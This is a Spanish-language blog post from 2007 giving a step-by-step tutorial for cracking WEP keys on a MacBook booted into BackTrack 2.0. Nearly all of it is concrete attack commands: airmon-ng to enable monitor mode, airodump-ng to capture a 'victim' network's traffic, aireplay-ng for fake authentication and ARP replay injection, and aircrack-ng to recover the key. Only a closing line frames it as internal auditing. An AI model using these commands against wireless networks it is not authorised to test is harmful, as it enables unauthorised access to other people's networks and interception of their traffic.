lunes, 30 de julio de 2007

Activar Macbook Modo Monitor (Crack Wep)




Bueno, si su pregunta es puedo realizar captura de trafico e inyeccion a la vez con macbook desde linux.. la respuesta es SI ahi les explico como.... (Realizado en un macbook core duo).

Primero tienen q bajar gratuitamente el livecd Backtrack 2.0 desde este link http://mirror.switch.ch/ftp/mirror/backtrack/bt2final.iso

1. bootear el livecd manteniendo la tecla C apretada hasta que bootee y vean un Boot:
2. En esta parte (Boot:) deberan ejecutar este comando bt noapic irqpoll acpi=force, este comando sirver para que no les dupliquen las teclas un bug que tiene backtrack.....
3. una vez dentro ejecutamos: modprobe ath_pci
4. despues paramos la interfaz wifi: airmon-ng stop ath0
5. ponemos en modo monitor la interfaz: airmon-ng start wifi0 9, es un cero despues de wifi por las dudas...
6. levantamos la interfaz: ifconfig ath0 up
7. hagamos de cuenta que ya ejecutamos kismet y vimos el canal de la victima y su ssid por ejemplo canal 1, ssid prueba, realizamos la captura de trafico con este comando: airodump-ng -c 1 -w dump ath0, -c seleccionas el canal con -w seleccionamos como se llama el archivo con la captura.
8. suponiendo que no hay ningun cliente conectado realizado un fake authentication con el siguiente comando: aireplay-ng -1 6000 -o 1 -q 10 -e prueba -a (aca ponen la macaddress del access point) -h (ponemos la mac address de nuestra tarjeta wifi) ath0, -e aca ponen el nombre del ssid, este comando envia paquetes keep alive para que poder realizar la inyeccion de trafico, antes del keep alive tienen q ver un succesfull ;-) o algo asi y despues lo keep alive...
9. ahora si a inyectar trafico!!! con este comando.. aireplay-ng -3 -b (mac address Acess point) -h (mac address tarjeta wifi) ath0, van a ver read packet y arp replay el arp replay va a estar en 0 pero esperan q en read packet llegue a 4000 paquetes o mas o menos depende..
10. bueno ahora volvemos a la terminal corriendo el airodump y vemos en la parte de data como sube calculen que para un clave de 64k necesitamos unas 100000 ivs o data como lo ven ahi.
11. mientras esta capturando podemos correr el aircrack y va desencriptando online mientras el airodump captura los paquetes... con este comando.. aircrack-ng -a 1 dump.cap

A disfrutarrrr!!!!!!!! aclaro... este tutorial sirve a modo de auditoria interna no hagan cagadassss.... ; D